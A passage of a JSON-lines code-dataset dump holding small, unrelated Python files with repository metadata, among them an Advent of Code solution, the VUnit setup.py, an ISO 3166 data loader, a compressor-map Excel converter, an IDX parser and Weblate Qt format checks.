InputError(Exception):\n pass\n","repo_name":"gurchz/Moneykeeper","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70044891364","text":"elves = []\nwith open(\"input.txt\") as infile:\n elf = []\n for calories in 
infile:\n if calories == \"\\n\":\n elves.append(elf)\n elf = []\n else:\n elf.append(int(calories.rstrip()))\n\n if elf:\n elves.append(elf)\n\ncalorie_sums = [ sum(calories) for calories in elves ]\nprint(max(calorie_sums))\n","repo_name":"diwasrimal/AOC","sub_path":"01/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26625642807","text":"import os\nimport sys\nfrom pathlib import Path\nfrom logging import warning\nfrom setuptools import setup\n\n# Ensure that the source tree is on the sys path\nsys.path.insert(0, str(Path(__file__).parent.resolve()))\n\nfrom vunit.about import version, doc # pylint: disable=wrong-import-position\nfrom vunit.builtins import osvvm_is_installed # pylint: disable=wrong-import-position\n\n\ndef find_all_files(directory, endings=None):\n \"\"\"\n Recursively find all files within directory\n \"\"\"\n result = []\n for root, _, filenames in os.walk(directory):\n for filename in filenames:\n ending = os.path.splitext(filename)[-1]\n if endings is None or ending in endings:\n result.append(str(Path(root) / filename))\n return result\n\n\nDATA_FILES = []\nDATA_FILES += find_all_files(\"vunit\", endings=[\".tcl\"])\nDATA_FILES += find_all_files(str(Path(\"vunit\") / \"vhdl\"))\nDATA_FILES += find_all_files(str(Path(\"vunit\") / \"verilog\"), endings=[\".v\", \".sv\", \".svh\"])\nDATA_FILES = [os.path.relpath(file_name, \"vunit\") for file_name in DATA_FILES]\n\nsetup(\n name=\"vunit_hdl\",\n version=version(),\n packages=[\n \"tests\",\n \"tests.lint\",\n \"tests.unit\",\n \"tests.acceptance\",\n \"vunit\",\n \"vunit.com\",\n \"vunit.parsing\",\n \"vunit.parsing.verilog\",\n \"vunit.sim_if\",\n \"vunit.test\",\n \"vunit.ui\",\n \"vunit.vivado\",\n ],\n package_data={\"vunit\": DATA_FILES},\n zip_safe=False,\n url=\"https://github.com/VUnit/vunit\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)\",\n \"Natural Language :: English\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: POSIX :: Linux\",\n \"Topic :: Software Development :: Testing\",\n \"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)\",\n ],\n python_requires=\">=3.6\",\n install_requires=[\"colorama\"],\n requires=[\"colorama\"],\n license=\"Mozilla Public License 2.0 (MPL 2.0)\",\n author=\"Lars Asplund\",\n author_email=\"lars.anders.asplund@gmail.com\",\n description=\"VUnit is an open source unit testing framework for VHDL/SystemVerilog.\",\n long_description=doc(),\n)\n\nif not osvvm_is_installed():\n warning(\n \"\"\"\nFound no OSVVM VHDL files. 
If you're installing from a Git repository and plan to use VUnit's integration\nof OSVVM you should run\n\ngit submodule update --init --recursive\n\nin your VUnit repository before running setup.py.\"\"\"\n )\n","repo_name":"VUnit/vunit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":651,"dataset":"github-code","pt":"52"} +{"seq_id":"27219979565","text":"\"\"\"\nSimple main to initialize a dfa and test input strings.\nRead from input until empty string is read, then terminate\n\"\"\"\nimport sys\nfrom dfa import DFA\n\nif __name__ == '__main__':\n A_DFA = DFA(sys.argv[1])\n IN_FILE = open(sys.argv[2])\n IN_STRING = IN_FILE.readline().replace('\\n', '')\n while IN_STRING != '':\n A_DFA.check_string(IN_STRING)\n IN_STRING = IN_FILE.readline().replace('\\n', '')\n","repo_name":"Kronemeyer/Foundations-of-Computation-DFA","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43354437987","text":"import re\nimport csv\nfrom collections import namedtuple\nfrom _utility.get_package_dir import get_package_dir\n\n\nCoord = namedtuple('Coord', [\n 'lat', 'long'\n])\n\nISO3166 = namedtuple('ISO3166', [\n 'a2', 'a3', 'n3'\n])\n\nCOWItem = namedtuple('COWItem', [\n 'iso3166',\n 'fips104',\n 'has_capital',\n 'continent',\n 'subcontinent',\n 'language',\n 'population',\n 'year',\n 'conventional_abbreviation',\n 'international_dialing_code',\n 'international_vehicle_code',\n\n 'area',\n 'coords',\n 'max_coords',\n 'min_coords',\n\n 'iso',\n 'un',\n 'ungegn',\n 'bgn',\n 'pcgn',\n 'fao',\n 'eki',\n 'url',\n])\n\n\ndef _get_data_items():\n r = []\n\n f = open(get_package_dir() / 'misc_data_scripts' / 'other_data' / 'iso_3166_1' / 'cow.csv',\n 'r', encoding='utf-8')\n\n for item in csv.DictReader(\n filter(lambda row: row[0]!='#', f),\n delimiter=';'\n ): \n for k in item:\n item[k] = item[k].strip()\n \n r.append(COWItem(**dict(\n iso3166=ISO3166(\n a2=item['ISO3166A2'],\n a3=item['ISO3166A3'],\n n3=item['ISO3166N3']\n ),\n fips104=item['FIPS104'],\n\n has_capital=item['HasCapital'],\n continent=item['continent'],\n subcontinent=item['subcontinent'],\n language=item['language'],\n population=int(item['population']),\n year=item['year'],\n conventional_abbreviation=item['conabbr'],\n\n international_dialing_code=item['ITU'],\n international_vehicle_code=item['IVC'],\n\n area=dict(\n land=item['land'],\n water=item['water'],\n lang_total=item['land_total']\n ),\n coords=Coord(\n float(item['latitude']),\n float(item['longitude'])\n ),\n max_coords=Coord(\n float(item['maxlatitude']),\n float(item['maxlongitude'])\n ),\n min_coords=Coord(\n float(item['minlatitude']),\n float(item['minlongitude'])\n ),\n\n iso=dict(\n name=dict(\n en=item['ISOen_name'],\n en_romanized=item['ISOen_ro_name'],\n fr=item['ISOfr_name'],\n es=item['ISOes_name']\n ),\n proper=dict(\n en=item['ISOen_proper'],\n en_romanized=item['ISOen_ro_proper'],\n fr=item['ISOfr_proper']\n ),\n region=dict(\n region=item['ISOregion'],\n subregion=item['ISOsubregion']\n )\n ),\n un=dict(\n en=item['UNen_capital'],\n fr=item['UNfr_capital'],\n es=item['UNes_capital'],\n ru=item['UNru_capital'],\n capital_coords=Coord(\n float(item['UNc_latitude']),\n float(item['UNc_longitude'])\n ) if item['UNc_latitude'].strip() else None\n ),\n ungegn=dict(\n name=dict(\n en=item['UNGEGNen_name'],\n 
fr=item['UNGEGNfr_name'],\n es=item['UNGEGNes_name'],\n ru=item['UNGEGNru_name'],\n native_romanized=item['UNGEGNlc_ro_name']\n ),\n longname=dict(\n en=item['UNGEGNen_longname'],\n fr=item['UNGEGNfr_longname'],\n es=item['UNGEGNes_longname'],\n ru=item['UNGEGNru_longname'],\n native_romanized=item['UNGEGNlc_ro_longname']\n ),\n capital_romanized=item['UNGEGNlc_capital'],\n ),\n bgn=dict(\n name=dict(\n en=item['BGN_name'],\n native_romanized=item['BGNlc_name']\n ),\n proper=dict(\n en=item['BGN_proper']\n ),\n longname=dict(\n en=item['BGN_longname'],\n en_romanized=item['BGNlc_longname']\n ),\n capital=item['BGN_capital'],\n capital_coords=Coord(\n float(item['BGNc_latitude']),\n float(item['BGNc_longitude'])\n ),\n demonym=item['BGN_demonym'],\n demonym_adjective=item['BGN_demomyn_adj']\n ),\n pcgn=dict(\n name=item['PCGN_name'],\n proper=item['PCGN_proper'],\n longname=item['PCGN_longname']\n ),\n fao=dict(\n name=item['FAOit_name'],\n proper=item['FAOit_proper'],\n longname=item['FAOit_longname']\n ),\n eki=dict(\n name=item['EKI_name'],\n longname=item['EKI_longname'],\n capital=item['EKI_capital']\n ),\n url=dict(\n url_gov=item['url_gov'],\n url_stats=item['url_stats'],\n url_gis=item['url_gis'],\n url_post=item['url_post']\n )\n )))\n\n return r\n\n\ndef _get_data_items_by_name():\n r = {}\n for i in _get_data_items():\n for en_name in (\n i.iso['name']['en'],\n i.iso['proper']['en'],\n i.un['en'],\n i.ungegn['name']['en'],\n i.ungegn['longname']['en'],\n i.bgn['name']['en'],\n i.bgn['proper']['en'],\n i.bgn['longname']['en']\n ):\n en_name = en_name.lower()\n if not en_name:\n continue\n\n assert r.get(en_name, i) == i, (en_name, i)\n r[en_name] = i\n\n en_name = re.sub(r'\\bthe|of|respublika|oblast|avtonomnyy okrug|okrug|republic\\b', '', en_name).strip().strip(',')\n while ' ' in en_name:\n en_name = en_name.replace(' ', ' ')\n r[en_name] = i\n return r\n\n\ndef _get_data_items_by_code():\n r = {}\n for i in _get_data_items():\n for code in (\n i.iso3166.a2,\n i.iso3166.a3,\n i.iso3166.n3\n ):\n code = code.lower()\n if not code:\n continue\n\n assert r.get(code, i) == i, (code, i)\n r[code] = i\n return r\n\n\n_data_items_by_name = _get_data_items_by_name()\n_data_items_by_code = _get_data_items_by_code()\n\n\ndef get_data_item_by_code(code):\n return _data_items_by_code[code.lower()]\n\n\ndef get_data_item_by_name(name):\n return _data_items_by_name[name.lower()]\n\n\nif __name__ == '__main__':\n from pprint import pprint\n pprint(_get_data_items_by_name())\n print(get_data_item_by_code('au'))\n print(get_data_item_by_code('usa'))\n print(get_data_item_by_name('australia'))\n","repo_name":"mcyph/world_subnational_covid_crawler","sub_path":"misc_data_scripts/other_data/iso_3166_1/iso_3166_data.py","file_name":"iso_3166_data.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21452772811","text":"import inspect\nfrom typing import Dict, List, Union\n\nfrom demisto_sdk.commands.error_code_info import error_code_info\n\n\ndef test_parse_function_parameters():\n def dummy_func(\n param1: str, param2: Dict, param3: Union[str, List], param4: int = 0\n ):\n return f\"error with {param1}, {param2.items()}, {param3}, {param4 + 1}\", 1234\n\n sig = inspect.signature(dummy_func)\n parameters = error_code_info.parse_function_parameters(sig)\n\n assert parameters[\"param1\"] == \"\"\n assert parameters[\"param2\"] == error_code_info.TYPE_FILLER_MAPPING[dict]\n assert 
parameters[\"param3\"] == \"\"\n assert parameters[\"param4\"] == error_code_info.TYPE_FILLER_MAPPING[int]\n","repo_name":"demisto/demisto-sdk","sub_path":"demisto_sdk/commands/error_code_info/tests/error_code_info_test.py","file_name":"error_code_info_test.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"52"} +{"seq_id":"37670086191","text":"# screen settings\nscreen_width = 1000\nscreen_height = 700\nbg_color = (230, 230, 230)\nbg_image = 'images/sky.png'\nobject_flip_interv = 0.002\ngame_over_font_delay = 2\n\n# my ship's settings\nmy_ship_speed = 4\nmy_bullet_speed = 6\nmy_bullet_gen_interv = 0.6\n\n# enemy's settings\nenemy_gen_interv = 2\nenemy_ship_speed = 3\nenemy_stay_time = 3\nenemy_stay_top_position = 20\nenemy_bullet_speed = 4\nenemy_bullet_gen_interv = 1.5\n\n# reward's settings\nreward_gen_interv = 30\nreward_speed = 4\npower_up_image_src = 'images/powerup.png'\n","repo_name":"JohnsonEEE/ShootAircraft","sub_path":"src/firstgame/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4165985458","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nEditor: Akshay\r\n\r\nReference: https://www.gasturb.de/download.html (User manual guide for smooth c)\r\n\"\"\"\r\n\r\n\r\n\r\nimport glob\r\nfiles=(glob.glob(\"Z:\\\\compressordata\\\\*.txt\"))\r\n\r\nfor text in range(len(files)): \r\n text=files[text]\r\n filename = open(text, \"r\").readlines()\r\n result = list(filename)\r\n # print (result)\r\n #Line 1\r\n line =result[0]\r\n file_input = line.split()\r\n # Map_Type_Indicator\r\n Map_type= int(file_input[0])\r\n print(\"Map_Type_Indicator:\", Map_type)\r\n # Compressor_Name\r\n y= file_input[1:(len(file_input))]\r\n Compressor_Name = '_'.join(y)\r\n print(\"Compressor_Name:\", Compressor_Name)\r\n \r\n # create excel file with headers\r\n import xlsxwriter\r\n workbook = xlsxwriter.Workbook('Z:\\\\compressordata\\\\preprocessed_excel_files\\\\'+Compressor_Name+'.xlsx') \r\n worksheet = workbook.add_worksheet() \r\n \r\n worksheet.write(0,0,'Map_Type_Indicator') \r\n worksheet.write(0,1, 'Compressor_Name') \r\n worksheet.write(0,2, 'RefSpeed') \r\n worksheet.write(0,3, 'RefBeta')\r\n worksheet.write(0,4, 'RefMach')\r\n worksheet.write(0,5, 'RefPsi') \r\n worksheet.write(0,6, 'RefPhi') \r\n worksheet.write(0,7, 'No_of_speed_lines')\r\n worksheet.write(0,8, 'Keyword') \r\n worksheet.write(0,9, 'Speed') \r\n worksheet.write(0,10, 'No_of_points_1') \r\n worksheet.write(0,11, 'No_of_points_2')\r\n worksheet.write(0,12, 'Mass_flow') \r\n worksheet.write(0,13, 'Pressure_ratio') \r\n worksheet.write(0,14, 'Efficiency')\r\n worksheet.write(0,15, 'Surge_Mass_flow')\r\n worksheet.write(0,16, 'Surge_Pressure_ratio')\r\n worksheet.write(0,17, 'Surge_Efficiency')\r\n \r\n # Counting total number of lines\r\n file = open(text, \"r\")\r\n number_of_lines = 0\r\n for line in filename:\r\n line = line.strip(\"\\n\")\r\n number_of_lines += 1\r\n file.close()\r\n print(\"lines:\", number_of_lines)\r\n \r\n # Writing down map type and cmpressor name \r\n worksheet.write(1, 0, Map_type) \r\n worksheet.write_string(1, 1, Compressor_Name)\r\n \r\n with open(text) as f:\r\n if 'RefSpeed' in f.read():\r\n print(\"Output1\")\r\n #Line 2\r\n line =result[1]\r\n file_input = line.split()\r\n x=str(file_input[0])\r\n s1 = x[x.find('=') + 1: ]\r\n RefSpeed= 
str(s1)#RefSpeed\r\n            print(\"RefSpeed:\", RefSpeed)\r\n            worksheet.write(1, 2, RefSpeed) \r\n            x=str(file_input[1])\r\n            s1 = x[x.find('=') + 1: ]\r\n            RefBeta= str(s1)#RefBeta\r\n            print(\"RefBeta:\", RefBeta)\r\n            worksheet.write(1, 3, RefBeta)\r\n            #Line 3\r\n            line =result[2]\r\n            file_input = line.split()\r\n            x=str(file_input[0])\r\n            s1 = x[x.find('=') + 1: ]\r\n            RefMach= str(s1)#RefMach\r\n            print(\"RefMach:\", RefMach)\r\n            worksheet.write(1, 4, RefMach)\r\n            x=str(file_input[1]) \r\n            s1 = x[x.find('=') + 1: ]\r\n            RefPsi= str(s1)#RefPsi\r\n            print(\"RefPsi:\", RefPsi)\r\n            worksheet.write(1, 5, RefPsi)\r\n            x=str(file_input[2])\r\n            s1 = x[x.find('=') + 1: ]\r\n            RefPhi= str(s1)#RefPhi\r\n            print(\"RefPhi:\", RefPhi)\r\n            worksheet.write(1, 6, RefPhi)\r\n            \r\n            #line4\r\n            line =result[3]\r\n            file_input = line.split()\r\n            Map_Type_Indicator = len(file_input)\r\n            # Number_of_speed_lines\r\n            Number_of_speed_lines= int(file_input[0])\r\n            print(\"Number_of_speed_lines:\", Number_of_speed_lines)\r\n            worksheet.write(1, 7, Number_of_speed_lines)\r\n            # Keyword\r\n            y= file_input[1:(len(file_input))]\r\n            Keyword = ''.join(y)\r\n            print(\"Keyword:\", Keyword)\r\n            worksheet.write(1, 8, Keyword)\r\n            \r\n            line =result[4]\r\n            file_input = line.split()\r\n            points=int(file_input[1])#Since num points_1=num points_2, taking first one\r\n            Num_speed_lines= Number_of_speed_lines\r\n            low_limit=4\r\n            z=low_limit\r\n            y=0\r\n            pt=0\r\n            Press_ratio_arr=[]\r\n            Mass_flow_arr=[]\r\n            Efficiency_arr=[]\r\n            Pts_upda=0\r\n            #Writing down the speed lines and points \r\n
            for num1 in range(0, Num_speed_lines):\r\n                x=num1\r\n                line =result[low_limit]\r\n                file_input = line.split()\r\n                # speed\r\n                speed= float(file_input[0])\r\n                print(\"speed:\", speed)\r\n                worksheet.write(Pts_upda+1, 9, speed)\r\n                # points\r\n                Num_points_1= int(file_input[1])\r\n                print(\"Num_points_1:\", Num_points_1)\r\n                worksheet.write(Pts_upda+1, 10, Num_points_1)\r\n                Num_points_2= int(file_input[2])\r\n                print(\"Num_points_2:\", Num_points_2)\r\n                worksheet.write(Pts_upda+1, 11, Num_points_2)\r\n                \r\n                # to find the lower and upper limit\r\n                z=z+pt+1\r\n                y=z+points \r\n                Pts_upda=Pts_upda + points\r\n                for num in range(z, y): \r\n                    line =result[num]\r\n                    file_input = line.split()\r\n                    Press_ratio=float(file_input[0])\r\n                    Press_ratio_arr.append(Press_ratio)\r\n                    print(\"Press_ratio:\", Press_ratio)\r\n                    Mass_flow=float(file_input[1]) \r\n                    Mass_flow_arr.append(Mass_flow)\r\n                    print(\"Mass_flow:\", Mass_flow)\r\n                    Efficiency=float(file_input[2]) \r\n                    Efficiency_arr.append(Efficiency)\r\n                    print(\"Efficiency:\", Efficiency)\r\n                    \r\n                low_limit=low_limit+points+1\r\n                pt=points\r\n                \r\n            worksheet.write_column(1, 12, Press_ratio_arr)\r\n            worksheet.write_column(1, 13, Mass_flow_arr) \r\n            worksheet.write_column(1, 14, Efficiency_arr)\r\n
            with open(text) as k:\r\n                if 'Surge Line' in k.read():\r\n                    # writing surge line\r\n                    p=5+Number_of_speed_lines+(points*Number_of_speed_lines)\r\n                    q=number_of_lines\r\n                    Pts_updat=0\r\n                    for num2 in range(p, q):\r\n                        line =result[num2]\r\n                        file_input = line.split()\r\n                        Press_ratio_surge=float(file_input[1])\r\n                        print(\"Press_ratio:\", Press_ratio_surge)\r\n                        Mass_flow_surge=float(file_input[2])\r\n                        print(\"Mass_flow:\", Mass_flow_surge)\r\n                        Efficiency_surge=float(file_input[3])\r\n                        print(\"Efficiency:\", Efficiency_surge)\r\n                        worksheet.write(Pts_updat+1, 15, Press_ratio_surge)\r\n                        worksheet.write(Pts_updat+1, 16, Mass_flow_surge) \r\n                        worksheet.write(Pts_updat+1, 17, Efficiency_surge)\r\n                        #Updating the points\r\n                        Pts_updat=Pts_updat + points\r\n                else:\r\n                    p=5+Number_of_speed_lines+(points*Number_of_speed_lines)\r\n                    q=number_of_lines\r\n                    Pts_updat=0\r\n\r\n                    for num2 in range(p, q):\r\n                        line =result[num2] \r\n                        worksheet.write(Pts_updat+1, 15, 'null')\r\n                        worksheet.write(Pts_updat+1, 16, 'null') \r\n                        worksheet.write(Pts_updat+1, 17, 'null')\r\n                        #Updating the points\r\n                        Pts_updat=Pts_updat + points\r\n        \r\n        \r\n
    else:\r\n        print(\"Output2\")\r\n        #line1\r\n        line =result[1]\r\n        file_input = line.split()\r\n        Map_Type_Indicator = len(file_input)\r\n        #Since no reference values, all the unknown values are assigned to null\r\n        worksheet.write(1, 2, 'null')\r\n        worksheet.write(1, 3, 'null')\r\n        worksheet.write(1, 4, 'null')\r\n        worksheet.write(1, 5, 'null')\r\n        worksheet.write(1, 6, 'null')\r\n        # Number_of_speed_lines\r\n        Number_of_speed_lines= int(file_input[0])\r\n        print(\"Number_of_speed_lines:\", Number_of_speed_lines)\r\n        worksheet.write(1, 7, Number_of_speed_lines)\r\n        # Keyword\r\n        y= file_input[1:(len(file_input))]\r\n        Keyword = ''.join(y)\r\n        print(\"Keyword:\", Keyword)\r\n        worksheet.write(1, 8, Keyword)\r\n        \r\n        line =result[2]\r\n        file_input = line.split()\r\n        points=int(file_input[1])\r\n        Num_speed_lines= int(Number_of_speed_lines)\r\n        low_limit=2\r\n        z=low_limit\r\n        y=0\r\n        pt=0\r\n        speed_upda=0\r\n        Press_ratio_arr=[]\r\n        Mass_flow_arr=[]\r\n        Efficiency_arr=[]\r\n        \r\n
        for num1 in range(0, Num_speed_lines):\r\n            x=num1\r\n            line =result[low_limit]\r\n            file_input = line.split()\r\n            # speed\r\n            speed= float(file_input[0])\r\n            print(\"speed:\", speed)\r\n            worksheet.write(speed_upda+1, 9, speed)\r\n            # points\r\n            Num_points_1= int(file_input[1])\r\n            print(\"Num_points_1:\", Num_points_1)\r\n            worksheet.write(speed_upda+1, 10, Num_points_1)\r\n            Num_points_2= int(file_input[2])\r\n            print(\"Num_points_2:\", Num_points_2)\r\n            worksheet.write(speed_upda+1, 11, Num_points_2)\r\n            \r\n            # to find the lower and upper limit\r\n            z=z+pt+1\r\n            y=z+points \r\n            speed_upda=speed_upda + points\r\n            #looping through the points\r\n            for num in range(z, y): \r\n                line =result[num]\r\n                file_input = line.split()\r\n                Press_ratio=float(file_input[0]) \r\n                print(\"Press_ratio:\", Press_ratio)\r\n                Press_ratio_arr.append(Press_ratio)\r\n                Mass_flow=float(file_input[1]) \r\n                Mass_flow_arr.append(Mass_flow)\r\n                print(\"Mass_flow:\", Mass_flow)\r\n                Efficiency=float(file_input[2])\r\n                Efficiency_arr.append(Efficiency)\r\n                print(\"Efficiency:\", Efficiency)\r\n                \r\n            low_limit=low_limit+points+1\r\n            pt=points\r\n        worksheet.write_column(1, 12, Press_ratio_arr)\r\n        worksheet.write_column(1, 13, Mass_flow_arr) \r\n        worksheet.write_column(1, 14, Efficiency_arr)\r\n
        with open(text) as k:\r\n            if 'Surge Line' in k.read():\r\n                # writing surge line\r\n                print(\"\\nAdding Surge points\")\r\n                p=3+Number_of_speed_lines+(points*Number_of_speed_lines)\r\n                q=number_of_lines\r\n                Pts_updat=0\r\n                for num2 in range(p, q):\r\n                    line =result[num2]\r\n                    file_input = line.split()\r\n                    Press_ratio_surge=float(file_input[1])\r\n                    print(\"Press_ratio:\", Press_ratio_surge)\r\n                    Mass_flow_surge=float(file_input[2])\r\n                    print(\"Mass_flow:\", Mass_flow_surge)\r\n                    Efficiency_surge=float(file_input[3])\r\n                    print(\"Efficiency:\", Efficiency_surge)\r\n                    worksheet.write(Pts_updat+1, 15, Press_ratio_surge)\r\n                    worksheet.write(Pts_updat+1, 16, Mass_flow_surge) \r\n                    worksheet.write(Pts_updat+1, 17, Efficiency_surge)\r\n                    #Updating the points \r\n                    Pts_updat=Pts_updat + points\r\n            else:\r\n                print(\"\\nNo Surge points\")\r\n                Pts_updat=0\r\n                for num2 in range(0, Number_of_speed_lines):\r\n                    line =result[num2] \r\n                    
worksheet.write(Pts_updat+1, 15, 'null')\r\n worksheet.write(Pts_updat+1, 16, 'null') \r\n worksheet.write(Pts_updat+1, 17, 'null')\r\n #Updating the points\r\n Pts_updat=Pts_updat + points \r\n \r\n workbook.close() \r\n \r\n \r\n \r\n","repo_name":"agakshay/Dataprocessing--Text-to-excel-data-","sub_path":"Data_conversion.py","file_name":"Data_conversion.py","file_ext":"py","file_size_in_byte":12654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4440529640","text":"import glob\nimport h5py\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport sys,os\nfrom scipy.ndimage.morphology import grey_opening\nimport scipy as sp\n\n\nflist = glob.glob('/home/rjonnal/data/Dropbox/Share/2g_aooct_data/Data/2016.04.12_2/*.hdf5')\n\n\nfor f in flist:\n h5 = h5py.File(f)\n offset_matrix = h5['model/z_offsets'][:]\n goodness_matrix = h5['model/z_offset_goodness'][:]\n\n om = offset_matrix[0,:,:]\n oms = grey_opening(om,(1,15))\n\n\n mode = sp.stats.mode(oms.ravel())[0][0]\n mask = np.zeros(oms.shape)\n lower_threshold = np.mean(oms)-2.0*np.std(oms)\n upper_threshold = np.mean(oms)+2.0*np.std(oms)\n cond = np.logical_and(foffset_matrix>lower_threshold,foffset_matrix= b:\n resto = a%b\n while resto != 0:\n a = b\n b = resto\n resto = a%b\n return b\n else:\n resto = b%a\n while resto != 0:\n b = a\n a = resto\n resto = b%a\n return a\n\n\n#a = int(input(\"Digite o primeiro valor: \"))\n#b = int(input(\"Digite o segundo valor: \"))\n#print(calcula_mdc(a,b))","repo_name":"VitorLorente/LP2_2s2017","sub_path":"lista_dicionario/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19074971520","text":"from envs.env import ArmEnv\nfrom algorithms.pd.PD import PD\nfrom algorithms.pd.pd_controller import learn\nimport numpy as np\n\n# set env\nenv = ArmEnv()\n\n# parameters\nalgorithm_name = 'pd'\ndata_path = './Data/'\nmodel_path = './model/' + algorithm_name + \"/\"\n\n\"\"\"parameters for running\"\"\"\nnb_epochs = 50\nnb_epoch_cycles = 50\nnb_rollout_steps = 300\n\nfile_name = 'Single_pos'+'_epochs_' + str(nb_epochs)\\\n + \"_episodes_\" + str(nb_epoch_cycles) + \\\n \"_rollout_steps_\" + str(nb_rollout_steps)\n\ndata_path_reward = data_path + algorithm_name + \"/\" + file_name + 'reward'\ndata_path_steps = data_path + algorithm_name + \"/\" + file_name + 'steps'\ndata_path_states = data_path + algorithm_name + \"/\" + file_name + 'states'\ndata_path_times = data_path + algorithm_name + \"/\" + file_name + 'times'\n\nmodel_name = file_name + 'model'\n\nsteps = []\n\n\ndef train():\n\n if algorithm_name == 'ddpg':\n from algorithms.ddpg.ddpg import learn\n learn(network='mlp',\n env=env,\n noise_type='normal_0.2',\n restore=False,\n nb_epochs=nb_epochs,\n nb_epoch_cycles=nb_epoch_cycles,\n nb_train_steps=60,\n nb_rollout_steps=nb_rollout_steps,\n data_path_reward=data_path_reward,\n data_path_steps=data_path_steps,\n data_path_states=data_path_states,\n data_path_times=data_path_times,\n model_path=model_path,\n model_name=model_name,\n )\n\n if algorithm_name == 'pd':\n from algorithms.pd.pd_controller import learn\n learn(\n controller=PD,\n env=env,\n nb_epochs=nb_epochs,\n nb_epoch_cycles=nb_epoch_cycles,\n nb_rollout_steps=nb_rollout_steps,\n data_path_reward=data_path_reward,\n data_path_steps=data_path_steps,\n data_path_states=data_path_states,\n data_path_times=data_path_times,\n )\n\n # if 
algorithm_name == 'ppo1'\n\n\nif __name__ == '__main__':\n train()","repo_name":"DengYuelin/RL_assembly","sub_path":"run_this.py","file_name":"run_this.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"184825900","text":"\"\"\"\nIDX file parser.\n\"\"\"\nimport struct\n\nimport numpy as np\n\n\ndef parse(path):\n \"\"\"\n Parses an IDX file to a numpy ndarray.\n\n NOTE: Performs no error checks whatsoever.\n\n :param path: Path to the idx file.\n :return: Numpy ndarray.\n \"\"\"\n data_types = {\n 0x08: np.uint8, # Unsigned byte\n 0x09: np.int8, # Signed byte\n 0x0B: np.int16, # Short\n 0x0C: np.int32, # Int\n 0x0D: np.float32, # Float\n 0x0E: np.float64, # Double\n }\n with open(path, 'rb') as file:\n file.read(2) # The first two bytes are always zero.\n data_type, dimensions = struct.unpack('BB', file.read(2))\n # The data is in big-endian order.\n dimension_sizes = struct.unpack('>{}'.format('I' * dimensions), file.read(dimensions * 4))\n data = np.fromfile(file, dtype=np.dtype(data_types[data_type]).newbyteorder('>'))\n return data.reshape(dimension_sizes)\n","repo_name":"fredrik-rose/ArtificialNeuralNetwork","sub_path":"artificialneuralnetwork/input/idxparser.py","file_name":"idxparser.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10293313274","text":"import re\n\nfrom django.utils.translation import gettext_lazy\n\nfrom weblate.checks.format import BaseFormatCheck\n\nQT_FORMAT_MATCH = re.compile(\n r\"\"\"\n %( # initial %\n L? # optional localized representation of numbers\n (?P\\d{1,2}) # variable order, like %1\n )\"\"\",\n re.VERBOSE,\n)\n\nQT_PLURAL_MATCH = re.compile(\n r\"\"\"\n %( # initial %\n L? 
# optional localized representation of numbers\n (?Pn) # plural: %n\n )\"\"\",\n re.VERBOSE,\n)\n\n\nclass QtFormatCheck(BaseFormatCheck):\n \"\"\"Check for Qt format string.\"\"\"\n\n check_id = \"qt_format\"\n name = gettext_lazy(\"Qt format\")\n description = gettext_lazy(\"Qt format string does not match source\")\n regexp = QT_FORMAT_MATCH\n\n def is_position_based(self, string):\n # everything is numbered\n return False\n\n\nclass QtPluralCheck(BaseFormatCheck):\n \"\"\"Check for Qt plural string.\"\"\"\n\n check_id = \"qt_plural_format\"\n name = gettext_lazy(\"Qt plural format\")\n description = gettext_lazy(\"Qt plural format string does not match source\")\n regexp = QT_PLURAL_MATCH\n\n def is_position_based(self, string):\n return True\n","repo_name":"WeblateOrg/weblate","sub_path":"weblate/checks/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":3905,"dataset":"github-code","pt":"52"} +{"seq_id":"73804434404","text":"def sequentialDigits(low, high):\n result = set()\n def helper(temp, remaining):\n if temp:\n if (low <= int(temp) <= high):\n result.add(int(temp))\n elif (int(temp) > high):\n return\n\n for i in range(len(remaining)):\n if (not temp or remaining[i]-int(temp[-1])==1):\n helper(temp+str(remaining[i]), remaining[i+1:])\n\n helper(\"\", [i for i in range(10)])\n return (sorted(result))\n\nlow = 1000\nhigh = 12000\nprint(sequentialDigits(low, 